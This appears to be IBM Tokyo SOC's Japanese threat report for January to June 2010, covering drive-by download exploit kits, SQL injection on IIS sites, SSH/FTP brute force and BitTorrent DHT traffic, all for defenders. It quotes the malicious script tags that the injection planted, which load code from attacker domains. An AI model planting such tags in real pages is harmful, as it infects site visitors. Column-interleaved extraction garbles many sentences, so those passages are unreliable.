2010年 上半期

IBM Security Services
Ahead of the Threat. ®
2010 年 上半期
Tokyo SOC
情報分析レポート
目
次
エグゼクティブ・サマリー ............................................................................. 3
1 ドライブ・バイ・ダウンロード攻撃 ............................................................. 4
1.1
攻撃のバリエーション ...................................................................................... 4
1.2
クライアント PC に残されている脆弱性................................................................. 7
1.3
まとめ.......................................................................................................... 7
[Column1] 悪用されるトップレベルドメインの変遷 ......................................................... 8
2 SQL インジェクション攻撃 ........................................................................ 9
2.1
攻撃の検知状況............................................................................................... 9
2.2
IIS を狙った攻撃............................................................................................. 9
2.3
攻撃のバリエーション .....................................................................................11
2.4
まとめ.........................................................................................................12
3 ブルートフォース攻撃............................................................................. 13
3.1
SSH サービスへのブルートフォース攻撃 ..............................................................13
3.2
FTP サービスへのブルートフォース攻撃 ...............................................................14
3.3
まとめ.........................................................................................................15
4 P2P 通信のアクティビティー.................................................................... 16
4.1
BitTorrent DHT トラフィックの検知状況..............................................................16
4.2
BitTorrent DHT トラフィックの内訳 ...................................................................16
4.3
まとめ.........................................................................................................18
[Column2] 長期間活動するワーム ..............................................................................19
5 今期話題となった脆弱性.......................................................................... 20
5.1
今期注目を集めた脆弱性...................................................................................20
5.2
Adobe Reader および Acorobat の Launch 機能を利用した攻撃.................................21
5.3
Java Deployment Toolkit の脆弱性(CVE-2010-1423) .........................................23
5.4
まとめ.........................................................................................................24
おわりに .................................................................................................. 25
2
2010 年上半期 Tokyo SOC 情報分析レポート
エグゼクティブ・サマリー
本レポートは、IBM が全世界で提供しているセキュリティー運用監視サービス「Managed Security
Services」
(MSS)の中で、世界 9 ヶ所(東京、ブリスベン、北米 4 拠点、ブリュッセル、オルトラン
ディア、バンガロール)の監視センター(セキュリティー・オペレーション・センター:SOC)にて
観測したセキュリティー・イベント情報に基づき、主として日本国内の企業環境に影響を与える脅威
の動向を、東京 SOC が独自に分析し、まとめたものです。
2010 年上半期(1-6 月期)は、前年に引き続き「ドライブ・バイ・ダウンロード攻撃」が企業環境
のクライアント PC に大きな被害を及ぼしました。 特に、新たな脆弱性が発見されてから対策パッチ
がリリースされるまでの間に攻撃を受ける「ゼロデイ攻撃」が増えてきているのが大きな特徴です。 ま
た、サード・パーティー製アプリケーションの脆弱性を悪用する攻撃が高い成功率を示しているのも
注目すべき点です。 これらに備えるためには、情報セキュリティー対策において、より高度な脆弱性
防御を行える仕組みと専門的な知識が必要となると考えられます。
一方、サーバーを対象とした攻撃では、
「SQL インジェクション攻撃」にいくつかの新しい動きが見
られました。 監視システムによる検知を回避する試みや、データベースに再利用可能な関数を書き込
む試みなど、新たな攻撃が確認されています。 また、この期間中には大規模な DoS 攻撃も観測され
ました。 1 月には 2 回、単一の攻撃元から OpenSSL の脆弱性を悪用した大規模な DoS 攻撃が仕掛
けられました。 2 月には Pushdo というボットネットによって SSL サービスを対象とした DDoS 攻
撃が行われています。
本レポートでは、上記のトピックに加え、公開サービスへの総当り攻撃である「ブルートフォース
攻撃」
、不審なトラフィック増加の見られた「P2P 通信のアクティビティー」を紹介し、最後に、ゼロ
デイ脆弱性として悪用されたものを中心に「今期話題となった脆弱性」について解説しております。
これらの情報を、セキュリティー・ポリシーの策定や、情報セキュリティー対策を設計する際の参
考として、また、情報セキュリティーに関する知識向上の一助として、ご活用いただければ幸いです。
3
2010 年上半期 Tokyo SOC 情報分析レポート
1 ドライブ・バイ・ダウンロード攻撃
ドライブ・バイ・ダウンロード攻撃とは、Web サイトを閲覧した PC に無許可にソフトウェアをイ
ンストールする攻撃手法です。攻撃者は SPAM メールのリンクや改ざんした Web サイトを悪用して
ユーザーを不正な Web サイトへ誘導することでこの攻撃を行います(図 1)
。近年この攻撃手法は、
クライアント PC にウィルスを感染させる典型的な手法となっています。
以降では、今期、東京 SOC で確認したドライブ・バイ・ダウンロード攻撃の特徴と、攻撃の際に悪
用された脆弱性について解説します。
1.1 攻撃のバリエーション
イトを閲覧したクライアント PC の脆弱性を悪用して
ウィルスに感染させるドライブ・バイ・ダウンロード
 ドライブ・バイ・ダウンロード攻撃の過去事例
2009 年 12 月頃から Gumblar 攻撃(
「Gumblar.X
攻撃」や「Gumblar.8080 攻撃」などを含む1)と呼ば
れる攻撃がインターネットにおける大きな脅威となり、
注目を集めています。この攻撃は、現在のドライブ・
バイ・ダウンロード攻撃の代表的な事例ですが、他に
も多くのバリエーションが存在します。
2007 年には、Mpack と呼ばれる攻撃ツールによっ
攻撃ツールです。攻撃者は、Mpack を設置した不正な
サイトにユーザーを誘導するために、一般の Web サ
イトに FTP 経由で侵入し、Web ページを改ざん(閲
覧したユーザーを自動的に不正なサイトにアクセスさ
せる Iframe タグを挿入)していました。
1
Gumblar、Gumblar.X、Gumblar.8080 の詳細については「2009 年
下半期 Tokyo SOC 情報分析レポート」をご参照下さい
https://www-935.ibm.com/services/jp/iss/pdf/tokyo_soc_report
2009_h2.pdf
て多数のクライアント PC がウィルスに感染させられ
たことが話題になりました。この Mpack は、Web サ
攻撃者
攻撃用不正Webサイト
改ざん
作成
クライアントアプリケ
ーションを攻撃するコ
ードや、ウイルスが設
置されたWebサイト
誘導元改ざんWebサイト
③ クライアントアプリケー
ションを攻撃するコードを
ダウンロードしてしまう
攻撃用不正Webサイト
にユーザーを誘導する
ためのコードが含まれ
た改ざんWebサイト
改ざん
② 改ざんWebサイトの不正
なコードにより、自動的に不
正なWebサイトにアクセスし
てしまう
④ 攻撃コードの対象となる
脆弱性が存在するとウイル
スに感染してしまう
① クライアントが
改ざんされた一般
のWebサイトにア
クセスする
感染
クライアントPC
図 1 一般的なドライブ・バイ・ダウンロード攻撃の流れ
4
2010 年上半期 Tokyo SOC 情報分析レポート
ドライブ・バイ・ダウンロード攻撃
Mpack が注目を集めたことで、ドライブ・バイ・ダ
例です2。この表で取り上げたものは、実際に使用され
ウンロード攻撃はインターネット上の脅威の 1 つとし
ているツール群の一部に過ぎません。このほかにも、
て広く認知されるようになりました。また、Mpack 出
多数のツールが利用されており、日々バージョンアッ
現以降、類似のドライブ・バイ・ダウンロード攻撃ツ
プを繰り返しています。
ールがインターネット上で多数売買されるようになり
ました。今日では、ドライブ・バイ・ダウンロード攻
撃を行う際に攻撃ツールを利用することは一般的にな
りつつあります。表 1 は、今期東京 SOC で検知した
2
表中の「脆弱性」は、それぞれのツールが悪用する脆弱性を表
しています。これは、東京 SOC にて確認した情報を元に記載して
いるため、実際のツールの仕様とは異なる可能性があります。
ドライブ・バイ・ダウンロード攻撃を行うツールの一
表 1 東京 SOC で検知したドライブ・バイ・ダウンロード攻撃ツールとツールが悪用する脆弱性一覧
脆弱性
MS06-014
MS06-006
MS07-009
CVE-2007-0071
CVE-2007-5659
CVE-2008-0655
CVE-2007-5755
CVE-2007-6250
MS09-032
MS08-041
CVE-2008-2992
MS08-078
CVE-2008-5353
MS09-002
CVE-2009-0355
CVE-2009-0927
MS09-043
CVE-2009-1862
CVE-2009-1869
CVE-2009-3269
CVE-2009-3867
CVE-2009-4324
CVE-2010-0188
MS10-018
N/A
CVE-2010-1423
CVE-2010-1885
ソ フ トウェア
MDAC
Windows Media Player プラグイン
MDAC
Adobe Flash Player
Adobe Reader/Acrobat
AOL Radio AmpX ActiveX
AOL Radio AmpX ActiveX
Microsoft Video ActiveX コントロール
Microsoft Access Snapshot Viewer
Adobe Reader/Acrobat
Internet Explorer
Java Runtime Environment(JRE)
Internet Explorer
Firefox
Adobe Reader/Acrobat
Microsoft Office Web コンポーネント
Adobe Flash Player
Adobe Flash Player
Opera
Java Runtime Environment(JRE)
Adobe Flash Player
Adobe Reader/Acrobat
Internet Explorer
AOL Radio AmpX ActiveX
Java Runtime Environment(JRE)
Windows ヘルプとサポートセンター
Gum bl a r.
80 80
●
●
Gumbl a r.
X
●
El eono re
1.4.1
●
●
●
●
●
Cri mePa ck
3.0
●
●
F R A GU S
Pho eni x
2 .0
YESEx pl oi t
J us tEx p l oi t
3.0
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
●
5
2010 年上半期 Tokyo SOC 情報分析レポート
ドライブ・バイ・ダウンロード攻撃
 今期流行していたドライブ・バイ・ダウンロード
攻撃の特徴
とを確認しています。これは、他のセキュリティー・
図 2 はドライブ・バイ・ダウンロード攻撃の検知数
の推移です。多い日には 200 件ほどの攻撃を確認して
います。
今期は、2009 年から引き続き Gumblar.8080 攻撃
が企業環境に大きな影響を及ぼしました。この攻撃で
は、現在も機能拡張が繰り返されています。今期は、
2010 年 1 月 に Adobe® Reader の 脆 弱 性
( CVE-2009-4324 )、 5 月 に Java® の 脆 弱 性
(CVE-2010-1423)
、6 月には Windows®ヘルプとサ
ポートセンターの脆弱性(CVE-2010-1885)を悪用
する機能拡張が確認されています。いずれも確認当時
はゼロデイ攻撃3でした。
その他には、Eleonore Exploit Pack や Yes Exploit
Toolkit、
Crimepack Exploit System、
Phoenix Exploit
Kit、Fragus Exploit Kit などのドライブ・バイ・ダウ
ンロード攻撃ツールを利用した攻撃を検知しています。
これらの攻撃ツールはインターネット上で売買されて
いるため、多数の攻撃者に悪用されています。このよ
うなツールは洗練された管理画面を備えており、管理
が容易なのが特徴です。また、初心者にも分かりやす
いインストールマニュアルなども準備されています。
2009 年 10 月から 12 月にかけて猛威を振るってい
た Gumblar.X 攻撃については、現在収束しているこ
ベンダーからの報告4であったように、Gumblar.X 攻
撃が日本を標的から外したことが関連していると考え
られます。Gumblar.X 攻撃が日本を標的外にする仕組
みは、MaxMind 社の IP アドレスから位置情報を取得
するツール「GeoIP」を利用した単純なものです。具
体的には、
不正な Web サイトに誘導されてきた PC(ド
ライブ・バイ・ダウンロード攻撃の被害者)の IP アド
レスから「GeoIP」によって国情報を取得し、それが
日本であればアクセスを拒否するというものです。そ
のため、
日本以外の国の IP アドレスを利用しているユ
ーザーは現在も Gumblar.X 攻撃の対象です。
外資系の企業などでは日本国内のオフィスでインタ
ーネットを利用していても、Web サイト閲覧時の IP
アドレスが、
他国の IP アドレスになっていることがあ
ります。実際に、東京 SOC では国外の IP アドレスを
利用している企業ユーザーが、未だにこの攻撃を受け
ていることを確認しています。攻撃が終了しているよ
うに見られるこの攻撃も、グローバルに展開している
企業環境では注意が必要です。
3
修正パッチが提供されていない脆弱性をゼロデイ脆弱性、同
脆弱性への攻撃をゼロデイ攻撃と呼称します
4
Securelist - Gumblar: Farewell Japan
http://www.securelist.com/en/blog/2132/Gumblar_Farewell_Jap
an
300
攻撃検知数
250
200
150
100
50
2010/06/25
2010/06/18
2010/06/11
2010/06/04
2010/05/28
2010/05/21
2010/05/14
2010/05/07
2010/04/30
2010/04/23
2010/04/16
2010/04/09
2010/04/02
2010/03/26
2010/03/19
2010/03/12
2010/03/05
2010/02/26
2010/02/19
2010/02/12
2010/02/05
2010/01/29
2010/01/22
2010/01/15
2010/01/08
2010/01/01
0
図 2 ドライブ・バイ・ダウンロード攻撃検知件数(東京 SOC 調べ:2010 年 1 月 1 日~6 月 30 日)
6
2010 年上半期 Tokyo SOC 情報分析レポート
ドライブ・バイ・ダウンロード攻撃
1.2 クライアント PC に残されて
いる脆弱性
成功率を示しています。 Adobe Reader/Acrobat と
JRE という 2 つのサード・バーティー製アプリケーシ
ョンだけで、
攻撃の成功事例の約 7 割を占めています。
最後に注目しておきたい脆弱性として、MDAC の脆
攻撃者はドライブ・バイ・ダウンロード攻撃を行う
弱性(MS06-014、MS07-009)があります。これら
際に、その成功率を高める目的で複数のアプリケーシ
は、4 年も前にパッチが公開されている Windows OS
ョンの脆弱性を狙うことが一般的です。前節で取り上
の脆弱性です。多くの企業環境では、Windows のパ
げた攻撃ツール(表 1)も、すべて複数の脆弱性の悪
ッチ管理が進んでおり、このような脆弱性の影響を受
用を試みるものです。
けることは考えづらい状況です。しかしながら、前述
東京 SOC では、以下のドライブ・バイ・ダウンロ
の調査結果は、未だにこの脆弱性が放置されたままの
ード攻撃について、攻撃の成功率が高い脆弱性を調査
PC を利用している環境が存在することを示していま
しました5。
す。
・Gumblar.8080 攻撃
1.3 まとめ
・Eleonore Exploit Pack による攻撃
・Fragus Exploit Kit による攻撃
ドライブ・バイ・ダウンロード攻撃では、放置され
・Crimepack Exploit System による攻撃
たサード・バーティー製のアプリケーションの脆弱性
を悪用された結果、被害が発生するケースが多くを占
図 3 はその結果です。最も攻撃の成功率が高い(脆
めています。Windows OS のパッチ管理に加え、サー
弱性が残されたままになっている)アプリケーション
ド・バーティー製アプリケーション(特に、Adobe
は、Adobe Reader/Acrobat でした。Adobe Reader
Reader/Acrobat と JRE)を含めた総合的なソフトウ
には、今期も外部プログラムを呼び出す仕様(Launch
機能)の問題や、ゼロデイ脆弱性(CVE-2010-1297)
が公開されています。新たな脆弱性が次々と発見され
ているため、攻撃者の格好の標的になっています。
次 に 成 功 率 が 高 い 脆 弱 性 は 、 JRE の 脆 弱 性
(CVE-2008-5353)でした。この脆弱性は、1 年以
ェア・バージョン管理を行うことが、ドライブ・バイ・
ダウンロード攻撃の効果的な対策となります。
5
東京 SOC で検知した該当ツールによる攻撃コードの送信を母
数とし、攻撃後にウィルス・ファイルのダウンロードを確認したケ
ースを「攻撃成功」として集計
上前の脆弱性であるにもかかわらず、現在も高い攻撃
4% 1%
38%
23%
Adobe Reader/Acrobatの脆弱性
(CVE-2009-4324など)
Java Runtime Environment(JRE)の脆弱性
(CVE-2008-5353など)
MDACの脆弱性 (MS06-014、MS07-009)
Snapshot Viewerの脆弱性 (MS08-041)
Other
34%
図 3 ウィルス・ダウンロードの原因となった脆弱性の割合(東京 SOC 調べ:2010 年 1 月 1 日~6 月 30 日)
7
2010 年上半期 Tokyo SOC 情報分析レポート
[Column1] 悪用されるトップレベルドメインの変遷
攻撃者は、
フィッシングやドライブ・バイ・ダウンロード攻撃のために不正な Web サイトを設置する際、
一般的なサイト管理者と同様に不正なサイトで利用するドメイン名をレジストリに登録しています。
ccTLD(国別コード・トップレベルドメイン)や、gTLD(ジェネリック・トップレベルドメイン)な
どのトップレベルドメインを管理するレジストリでは、不正利用を目的としたドメイン登録を排除するた
めに、登録基準の厳密化を進めています。特に、以前からドメイン名を不正な行為に利用される事例が多
いことを指摘されている「.cn」ドメインや「.ru」ドメインでは、最近規制の強化が行われました。
「.cn」ドメインを管理する CNNIC(China Internet Network Information Center)は 2009 年 12
月、個人名義でのドメイン名登録申請を停止しました6。また、「.ru」ドメインを管理する Coordination
Center for TLD RU は、2010 年 4 月より、個人名義での登録であればパスポートのコピーを、企業の
場合は法的な登録書類などのコピーを提出することを義務づけるようになりました7。
このような、レジストリによるドメイン登録の規制によって、実際のドメイン登録件数にも変化が出て
います。VeriSign の報告8によると、2010 年 1 月から 3 月地点でのドメイン登録件数は、それまで 2
位だった「.cn」ドメイン登録数が減少し 4 位に後退しています。
東京 SOC で、
このような規制によって不正利用されるドメイン名に変化があったのかを調査しました。
図 4 は、ドライブ・バイ・ダウンロード攻撃に利用されたドメイン名のトップレベルドメインの割合で
す。今期の「.cn」ドメインの割合は、2009 年前半と比べると大きく減少しています。一方「.ru」ドメ
インは、依然として多くの攻撃に利用され続けています。しかし、対策が行われたのは 2010 年 4 月です
ので、今後減少する可能性があります。
これらの検知状況からは、レジストリでの対策が一定の効果を発揮しているように感じられます。今後
も、このようなレジストリによる対策が進むことが望まれます。
2%
3%
11%
35%
45%
cn
com
net
org
jp
ru
Other
4%
6%
29%
19%
41%
33%
com
cn
ru
org
net
jp
Other
4%
5%
6%
9%
ru
com
jp
org
net
cn
Other
1%
4%
5%
5%
25%
8%
図 4 ドライブ・バイ・ダウンロード攻撃で利用されるトップレベルドメインの変遷
(東京 SOC 調べ 左:2009 年 1 月~6 月 中:2009 年 7 月~12 月 右:2010 年 1 月~6 月)
6
CNET Japan - .CN ドメイン:個人名義の申請停止
http://japan.cnet.com/blog/zucoco/2009/12/14/entry_27035829/
7
Computerworld.jp - ロシアの「.ru」ドメインの登録手続きが厳格化へ――サイバー犯罪の防止がねらい
http://www.computerworld.jp/topics/vs/177469.html
8
Verisign - THE DOMAIN NAME INDUSTRY BRIEF VOLUME 7 - ISSUE 2 - JUNE 2010
http://www.verisign.com/domain-name-services/domain-information-center/domain-name-resources/domain-name-report-j
une10.pdf
8
2010 年上半期 Tokyo SOC 情報分析レポート
2 SQL インジェクション攻撃
SQL インジェクション攻撃は、Web アプリケーションへの入力を介して Web アプリケーションと
連動するデータベースに不正に SQL 命令を実行させる攻撃です。データベースに格納された情報の不
正取得を目的とした攻撃に加え、2008 年頃からは Web サイトの改ざんを目的とした攻撃も行われる
ようになり、Web アプリケーションに対する代表的な脅威のひとつとなっています。
2.1 攻撃の検知状況
2.2 IIS を狙った攻撃
 大規模な攻撃は確認されないが攻撃は継続し
ている
 ドライブ・バイ・ダウンロード攻撃のための Web
サイト改ざん
図 5 は今期東京 SOC で検知した SQL インジェクシ
2010 年 6 月 7 日頃から、IIS を対象とした Web サ
ョン攻撃の検知数の推移です。2009 年から引き続き、
イト改ざん目的の SQL インジェクション攻撃を断続
SQL インジェクションの脆弱性を持つ Web サイトを
的に検知しています。図 6(次頁)は、IIS を狙った
発見するための調査行為を検知しています。また、6
攻撃の検知件数の推移です。
月には IIS を標的として、データベース内の情報を書
き換えることによる Web サイト改ざん目的の攻撃の
増加を確認しました。
5,000
4,500
4,000
3,500
3,000
2,500
2,000
1,500
1,000
500
0
2010/06/25
2010/06/18
2010/06/11
2010/06/04
2010/05/28
2010/05/21
2010/05/14
2010/05/07
2010/04/30
2010/04/23
2010/04/16
2010/04/09
2010/04/02
2010/03/26
2010/03/19
2010/03/12
2010/03/05
2010/02/26
2010/02/19
2010/02/12
2010/02/05
2010/01/29
2010/01/22
2010/01/15
2010/01/08
2010/01/01
攻撃検知数
図 5 SQL インジェクション攻撃の検知件数推移
(東京 SOC 調べ:2010 年 1 月 1 日~6 月 30 日)
9
2010 年上半期 Tokyo SOC 情報分析レポート
SQL インジェクション攻撃
攻撃は、図 7 のような難読化された SQL 命令を含
イトへ自動的にアクセスさせられます。不正な Web
む HTTP リクエストによって行われます。この SQL
サイトには、クライアント PC の脆弱性を狙う攻撃コ
命令は、SQL Server 内の既存のデータの末尾に表 2
ードが設置されており、クライアント PC に脆弱性が
(次頁)のような URL を含む SCRIPT タグを追記す
存在する場合、ウィルスに感染します。
ることで、Web サイトの内容を改ざんしようとするも
不正な Web サイトのうち、6 月 7 日から 6 月 18
のです。SCRIPT タグに記載される URL は、頻繁に変
日に挿入された「2677.in」と「4589.in」には、Adobe
更されていました。
Flash Player の脆弱性(CVE-2010-1297)を対象と
SQL インジェクション攻撃による Web サイト改ざ
した攻撃コードが設置されていました。該当する脆弱
んの目的は、改ざんした Web サイトを閲覧したクラ
性の修正パッチが公開されたのは 2010 年 6 月 10 日
イアント PC に対するドライブ・バイ・ダウンロード
なので、この攻撃はパッチ提供前の脆弱性を狙った攻
攻撃です。改ざんされた Web サイトを閲覧したユー
撃(ゼロデイ攻撃)でした。
ザーは追記された SCRIPT タグにより不正な Web サ
IISを狙った調査行為
IISを狙った改ざん攻撃
1,800
1,600
1,400
1,200
1,000
800
600
400
200
0
2010/06/25
2010/06/18
2010/06/11
2010/06/04
IISを狙った改ざん攻撃
2010/05/28
2010/05/14
2010/05/07
2010/04/30
2010/04/23
2010/04/16
2010/04/09
2010/04/02
2010/03/26
2010/03/19
2010/03/12
2010/03/05
2010/02/26
2010/02/19
2010/02/12
2010/02/05
2010/01/29
2010/01/22
2010/01/15
2010/01/08
2010/01/01
IISを狙った調査行為
2010/05/21
4,500
4,000
3,500
3,000
2,500
2,000
1,500
1,000
500
0
図 6 IIS を狙った SQL インジェクション攻撃の検知件数推移
(東京 SOC 調べ:2010 年 1 月 1 日~6 月 30 日)
送信されたHTTPリクエスト
(SQL命令は難読化されている)
難読化解除後のSQL命令
図 7 IIS を狙った SQL インジェクション攻撃で利用される SQL 命令
10
2010 年上半期 Tokyo SOC 情報分析レポート
SQL インジェクション攻撃
SQL インジェクション攻撃は目新しいものではあ
脆弱性の有無の調査や Web サイト改ざんに利用され
りませんが、現在でも最新の攻撃の一部として行われ
るものとは異なる SQL 命令の挿入が試みられていま
ています。また、これらの攻撃により、国内の Web
した。図 8 がその SQL 命令です。
サイトを含む多くの Web サイトが改ざんされている
ことが報告されています。
この SQL 命令は、指定した文字列の一部を別の文字
列に置換する機能を持つ関数を作成します。このよう
な SQL 命令によって作成された関数は別の SQL 命令
2.3 攻撃のバリエーション
から呼び出すことが可能ですが、この攻撃は、関数の
作成のみを行っており、関数の呼び出しは確認されま
その他、今期確認された SQL インジェクション攻撃
のバリエーションをご紹介します。
せんでした。そのため、攻撃者が何らかのテストを行
ったか、今後別の攻撃を行うための事前準備を行った
ものと推測されます。
 文字列を置換する関数を作成する攻撃
2010 年 6 月 29 日 2:00 頃から 11:30 頃にかけて
検知した IIS を狙う SQL インジェクション攻撃では、
表 2 攻撃検知時期と利用されたスクリプトタグ
検知時期
利用されたスクリプトタグ
6 月 7 日~6 月 18 日
<script src=http://2677.in/yahoo.js></script>
<script src=http://4589.in/yahoo.js></script>
6 月 22 日~6 月 27 日
<script src=http://func.postfolkovs.ru/js.js></script>
<script src=http://file.postfolkovs.ru/js.js></script>
<script src=http://locate.webservicedevlop.ru/js.js></script>
<script src=http://comm.webserviceftp.ru/js.js></script>
<script src=http://post.webservicebba.ru/js.js></script>
<script src=http://netmsg.webservicesmulti.ru/js.js></script>
<script src=http://url.webservicemulti.ru/js.js></script>
<script src=http://dns.webservicesrob.ru/js.js></script>
など、多数の URL
6 月 29 日以降
<script src=http://22dfn.com/ff/y.js></script>
図 8 関数の作成を行う SQL インジェクション攻撃の攻撃文字列(一部)
11
2010 年上半期 Tokyo SOC 情報分析レポート
SQL インジェクション攻撃
 HEAD メソッドを利用した攻撃
2008 年 12 月を最後に、不特定多数の Web サイトを
SQL インジェクション攻撃は、SQL 命令を組み込ん
狙う大規模な攻撃は確認されておりませんが、SQL イ
だ HTTP リクエストによって行われます。リクエスト
ンジェクションの脆弱性の有無を調査する攻撃は定常
URL 内に SQL 命令を記述する手法が代表的ですが、
的に行われています。
2008 年 10 月に Cookie フィールドを利用した攻撃が、
また、ドライブ・バイ・ダウンロード攻撃を目的と
また 2009 年 1 月には Referer フィールドを利用した
して Web サイト改ざんを狙う SQL インジェクション
攻撃が確認されるなど、リクエスト URL 以外のフィー
攻撃も断続的に行われています。国内でも多数の Web
ルドを利用した攻撃も確認されています。
サイトが改ざんの被害を受けているため、引き続き注
今期は、HEAD メソッドに SQL 命令を記述した攻撃
意が必要な攻撃であると言えます。Web サイトの管理
が確認されました。SQL インジェクション攻撃で利用
を担当されている方は、SQL インジェクション攻撃に
される HTTP リクエストでは、通常 GET メソッドや
よる被害を未然に防ぐために、この攻撃への対策がで
POST メソッドが利用されますが、今期確認された攻
きているかご確認ください9。
撃では、HEAD メソッドを利用して SQL 命令を送信し
今期は、HEAD メソッドを利用した攻撃や、データ
ていました。図 9 は HEAD メソッドを利用した攻撃の
ベース上に関数を作成する攻撃が確認されるなど、新
例です。このような攻撃は、Web アプリケーションに
たな攻撃も見られましたが、いずれも正しく対策が行
おける攻撃対策や IDS/IPS などによる検知の回避を
われていれば特別な対応が必要となるものではありま
意図したものである可能性が考えられます。
せん。なお、一度対策を実施しても、Web アプリケー
ションの更新などにより新たに脆弱性が作りこまれて
2.4 まとめ
しまう可能性もあるため、定期的に Web アプリケー
ション診断を行い、対策の効果を確認することを推奨
2008 年 3 月に Web サイト改ざんを目的とした攻撃
が行われ、世界中の多くの Web サイトが改ざんされ
て以来、SQL インジェクション攻撃は Web アプリケ
ーションにおける主要な脅威のひとつとなっています。
します。
9
情報処理推進機構 - 「安全な SQL の呼び出し方」
http://www.ipa.go.jp/security/vuln/press/201003_websecurity_s
ql.html
図 9 HEAD メソッドに記述された SQL 命令
12
2010 年上半期 Tokyo SOC 情報分析レポート
3 ブルートフォース攻撃
ブルートフォース攻撃とは、パスワード認証を用いる公開サービスに対して任意の手法で生成したアカウント
とパスワードの組み合わせでログイン試行を繰り返し、有効な組み合わせを推測する攻撃を意味します。辞書を
元にパスワードを生成することから「辞書攻撃」と呼ばれることもあります。東京 SOC では特に広く使用されて
いる SSH と FTP サービスを対象としたブルートフォース攻撃の状況を注視しています。
3.1 SSH サービスへのブルート
フォース攻撃
数は 2009 年 8 月ごろと比較して約 1.5 倍に増加して
います(図 10)
。これは、攻撃元ごとのログイン試行
回数を減らすことで、サーバーや IDS/IPS にブルート
攻撃検知数はほぼ横ばいですが、攻撃元 IP アドレス
数に増加傾向が見られます。今期の攻撃元 IP アドレス
フォース攻撃を検出されることを回避しようとする攻
撃者側の意図によるものと考えられます。
攻撃検知数
攻撃元IPアドレス数
100
90
80
70
60
50
40
30
20
10
0
2010/06/30
2010/06/16
2010/06/02
2010/05/19
2010/05/05
攻撃元IPアドレス数
2010/04/07
2010/03/24
2010/03/10
2010/02/24
2010/02/10
2010/01/27
2010/01/13
2009/12/30
2009/12/16
2009/12/02
2009/11/18
2009/11/04
2009/10/21
2009/10/07
2009/09/23
2009/09/09
2009/08/26
2009/08/12
2009/07/29
2009/07/15
2009/07/01
攻撃検知数
2010/04/21
500,000
450,000
400,000
350,000
300,000
250,000
200,000
150,000
100,000
50,000
0
図 10 SSH サービスを対象としたブルートフォース攻撃の検知数推移
(東京 SOC 調べ:2009 年 7 月 1 日~2010 年 6 月 30 日)
13
2010 年上半期 Tokyo SOC 情報分析レポート
ブルートフォース攻撃
3.2 FTP サービスへのブルート
フォース攻撃
図 12 は 2010 年に行われた FTP サービスへのブル
ートフォース攻撃で用いられたアカウント名です。
5132 種類のアカウント名が用いられおり、もっとも
FTP サービスへのブルートフォース攻撃の検知数は、
2009 年から引き続き減少傾向となりました
(図 11)
。
多く狙われたのは「Administrator」や「admin」と
いった管理者の初期アカウント名でした。これは、実
際にサーバーで運用されており、十分な権限が付与さ
2010 年 1 月、3 月、4 月に一時的な検知数の急増が
れている可能性が高いためと考えられます。また、一
見られますが、いずれも一部のサーバーを対象とした
部 の 文 字 を 記 号 や 数 字 に 置 き 換 え た
攻撃であり、全体的な攻撃傾向の変動を示すものでは
「@dm1n1strat0r」のようなアカウント名も試行さ
ありません。一方、SSH サービスへの攻撃と同様に攻
れていました。
撃元 IP アドレス数が増加しているため、FTP サービ
スへの攻撃も、攻撃の検出回避を意識した手法にシフ
トしてきているものと考えられます。
攻撃検知数
攻撃元IPアドレス数
90
80
70
60
50
40
30
20
10
0
2010/06/30
2010/06/16
2010/06/02
2010/05/19
2010/05/05
攻撃元IPアドレス数
2010/04/07
2010/03/24
2010/03/10
2010/02/24
2010/02/10
2010/01/27
2010/01/13
2009/12/30
2009/12/16
2009/12/02
2009/11/18
2009/11/04
2009/10/21
2009/10/07
2009/09/23
2009/09/09
2009/08/26
2009/08/12
2009/07/29
2009/07/15
2009/07/01
攻撃検知数
2010/04/21
900,000
800,000
700,000
600,000
500,000
400,000
300,000
200,000
100,000
0
図 11 FTP サービスを対象としたブルートフォース攻撃の検知数推移
(東京 SOC 調べ:2009 年 7 月 1 日~2010 年 6 月 30 日)
23%
6%
3%
2%
2%
64%
Administrator
admin
ftpuser
service
test
Other
図 12 FTP サービスへのブルートフォース攻撃で用いられたアカウント名
(東京 SOC 調べ:2010 年 1 月 1 日~6 月 30 日)
14
2010 年上半期 Tokyo SOC 情報分析レポート
ブルートフォース攻撃
3.3 まとめ
SSH や FTP サービスへのブルートフォース攻撃に
対しては、可能な限りサーバーへの接続要求元を限定
2010 年に入り、SSH サービスへのブルートフォー
ス攻撃だけでなく FTP サービスに対する攻撃につい
ても、サーバーや IDS/IPS にブルートフォース攻撃
として識別されることを回避しようとする意図がみら
れるようになりました。ブルートフォース攻撃は古く
からある攻撃手法ですが、ボットなどの新しい仕組み
と組み合わせることで、今後も引き続き行われる攻撃
であると考えられます。
することで、攻撃にさらされる危険性を低減すること
が可能です。接続要求元を限定することができず、サ
ーバーや IPS 等で送信元 IP ごとに連続試行を遮断す
るような対策を行っている場合には、前節で紹介した
ような攻撃検知を回避する試みの影響を受ける可能性
があるので、サーバーへの接続ログなどを参考に、遮
断閾値が適切か定期的に見直しを行うことを推奨しま
す。
15
2010 年上半期 Tokyo SOC 情報分析レポート
4 P2P 通信のアクティビティー
東京 SOC では、明確に攻撃と識別されるアクティビティー以外に、P2P アプリケーションや Web メールを利
用したファイル共有など、情報漏洩や著作権違反につながる可能性のあるトラフィックを適宜監視しています。
本章では、今期特異な傾向の見られた BitTorrent DHT ネットワークのトラフィックを紹介し、想定される影響と
対策を提示します。
4.1 BitTorrent DHT トラフィック
の検知状況
東京 SOC では、2010 年初頭から、BitTorrent DHT
通信の検知イベントの急増を確認しています。
DHT とは分散ハッシュテーブル(Distributed Hash
宛先 IP アドレスの推移から、送信元ノードの増加が
DHT トラフィックのイベントの増加と比例している
ことが分かります。
4.2 BitTorrent DHT トラフィック
の内訳
Table)の略で、BitTorrent ネットワークを Tracker
(中央サーバー)なしで運用するための仕組みです。
 DHT トラフィックの向きと内容
これ は、BitTorrent ネ ットワー クにおいて 、従来
前節の検知状況からは、インターネット全般におけ
Tracker が保持していた Peer の保有するファイル情
る BitTorrent の利用が活発になったという解釈も可
10
報を複数のノードで分散管理するものです 。
図 13 は、東京 SOC で監視している複数の企業環境
における DHT 関連イベントの検知状況です。
2 月~3 月にかけて DHT 関連イベントが急増してい
能ですが、トラフィックの向きと内容に注目すると、
そのような解釈が難しくなります。
10
BitTorrent.org - DHT Protocol
http://www.bittorrent.org/beps/bep_0005.html
